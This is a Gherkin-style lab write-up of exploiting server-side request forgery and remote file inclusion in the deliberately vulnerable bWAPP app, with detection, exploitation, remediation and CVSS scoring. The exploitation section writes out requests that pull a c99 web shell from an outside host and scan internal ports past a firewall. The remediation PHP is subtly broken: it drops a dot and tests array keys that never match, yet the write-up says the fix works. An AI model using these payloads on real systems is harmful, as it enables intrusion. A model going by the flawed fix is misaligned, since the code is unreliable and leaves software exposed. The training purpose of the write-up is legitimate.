## Version 1.4.1
## language: en

Feature:
  TOE:
    bWAPP
  Location:
    http://192.168.0.4/bWAPP/rlfi.php - Parameter (header)
  CWE:
    CWE-918: Server-Side Request Forgery
  Goal:
    Use this web server as a proxy
  Recommendation:
    Create a white list of trusted pages

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu          | 18.04.1(x64)|
    | Mozilla Firefox | 63.0        |
  TOE information:
    Given I am running bWAPP on a beebox VM via VirtualBox on http://bWAPP
    And The url is "http://bWAPP/ssrf.php"
    Then I access the application with my broswer

  Scenario: Normal use case
  Avoid access controls and use the server as a proxy for 3 scenarios
    Given I have accessed the url
    """
    http://bWAPP/ssrf.php
    """
    And I see that the application gives me a description of the vulnerability
    And He shows me the following message
    """
    Server Side Request Forgery, or SSRF, is all about bypassing
    access controls such as firewalls.
    Use this web server as a proxy to:

    1. Port scan hosts on the internal network using RFI.

    2. Access resources on the internal network using XXE.

    3. Crash my Samsung SmartTV (CVE-2013-4890) using XXE :)
    """
    And I select the first option
    Then I see that the page redirects me to a txt file
    """
    http://evil/ssrf-1.txt
    """

  Scenario: Static detection
  The application allows pages to be included
    When I look at the code http://bWAPP/rlfi.php
    Then I could see that it included any file without a verification
    """
    34 $language = $_GET["language"];
    """
    And I know I can include a file to run remotely

  Scenario: Dynamic detection
  Verify if the web server restricts connections to the same
    Given I decide to do a port scan using RFI
    Then I'm going to the url where the RFI vulnerability is
    """
    http://bWAPP/rlfi.php
    """
    Then I try to see if the site allows me to make a connection locahost
    Then I sent the request using the language parameter
    """
    http://bWAPP/rlfi.php?language=http://127.0.0.1:80&action=go
    """
    Then I see that it shows me the output[evidence](output.png)
    And I can see that port 80 is open
    Then I do not have any restrictions to send requests

  Scenario: Exploitation
  Scanned ports using RFI
    Given I can make a request through the server without any restriction
    And I know the ip of the application
    """
    192.168.0.4
    """
    Then I look for a script to upload local files to the remote server
    """
    http://deepshells.com/shell/c99.txt
    """
    And I included it in the language parameter
    """
    http://bWAPP/rlfi.php?language=http:
    //deepshells.com/shell/c99.txt&action=go
    """
    And I see that it includes it without any restriction
    And I uploaded the ssrf-1.txt script that scans the ports
    Then I try to do the port scan by adding the ip parameter to my request
    """
    http://bWAPP/rlfi.php?ip=192.168.0.4&
    language=http://192.168.0.4/bWAPP/ssrf-1.txt&action=go
    """
    Then I can scan the ports without being detected by the firewall
    And I can see the list of ports[evidence](ports.png)

  Scenario: Remediation
  Create a white list of pages that can be accessed
    Given I entry to the code
    Then I create a white list with the pages that can be included
    """
    34 $page = array("lang_en.php", "lang_fr.php", "lang_nl.php");
    35 $language = $_GET["language"]."php";
    """
    And I can verify if the parameter entered by the user is in the list
    Then I use the following code to do the verification
    """
    183 <?php
    184 if(isset($_GET["language"]))
    185 {
    186     if($_COOKIE["security_level"] == "0")
    187     {
    188          if(isset($page[$language]) && file_exists($language)) {
    189              include($language);
    190          }
    191     }
    192     else
    193     {
    194          echo("Fail");
    195     }
    196 }
    197 ?>
    """
    Then I try to verify if I can scan the ports
    """
    http://bWAPP/rlfi.php?language=http://127.0.0.1:80&action=go
    """
    And I see the Fail message
    Then I can confirm that the vulnerability was patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.5/10 (Medium) - AV:A/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.2/10 (Medium) - E:F/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.2/10 (Medium) - CR:M/IR:H/AR:H

  Scenario: Correlations
    No correlations have been found to this date 2018-12-28